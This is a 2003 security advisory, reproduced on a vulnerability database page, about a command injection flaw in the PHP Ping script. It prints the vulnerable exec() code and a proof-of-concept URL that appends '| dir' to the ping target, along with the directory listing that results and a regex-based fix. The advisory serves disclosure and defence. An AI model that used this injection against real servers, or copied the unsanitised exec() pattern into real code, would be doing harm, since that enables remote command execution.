Vulners
Lucene search
SCSA009.txt
🗓️ 07 Mar 2003 00:00:00Reported by Gregory Le BrasType 
packetstorm🔗 packetstormsecurity.com👁 25 Views
`________________________________________________________________________
Security Corporation Security Advisory [SCSA-009]
________________________________________________________________________
PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
________________________________________________________________________
DESCRIPTION
________________________________________________________________________
PHP ping "will allow you, provided that your server turns under Windows,
to realize a "ping" on the host of your choice."
(direct quote from PHP Ping website)
DETAILS
________________________________________________________________________
A vulnerability have been found in PHP ping which allow attackers to
execute remote command.
This vulnerability would allow a remote attacker to compromise parts of
the operating system, possibly the complete operating system.
Vulnerable code :
<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-------------------------------------
?>
EXPLOIT
________________________________________________________________________
The vulnerability was discovered in the page for execute "ping",
at this adress :
http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir
This exploit simply show the contents of the current repertory.
c:\phpping
03/03/2003 23:01 <DIR> .
03/03/2003 23:01 <DIR> ..
03/03/2003 23:00 <DIR> img
30/04/2002 23:13 3217 index.php
30/04/2002 23:19 921 README
03/03/2003 23:03 0 resultat.ping
3 file(s) 4138 bytes
3 Dir(s) 11413962752 bytes free
SOLUTIONS
________________________________________________________________________
For example use this code :
<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){
# BugFix by Gregory LEBRAS www.security-corp.org
if( (!$cible) ||
(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
echo("Error: Please specify a valid target host or IP.");
exit;
}
else
{
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//------------------------------------
VENDOR STATUS
________________________________________________________________________
The vendor has reportedly been notified.
LINKS
________________________________________________________________________
Version Française :
http://www.security-corp.org/advisories/SCSA-009-FR.txt
------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org
------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Mar 2003 00:00Current
7.4High risk
Vulners AI Score7.4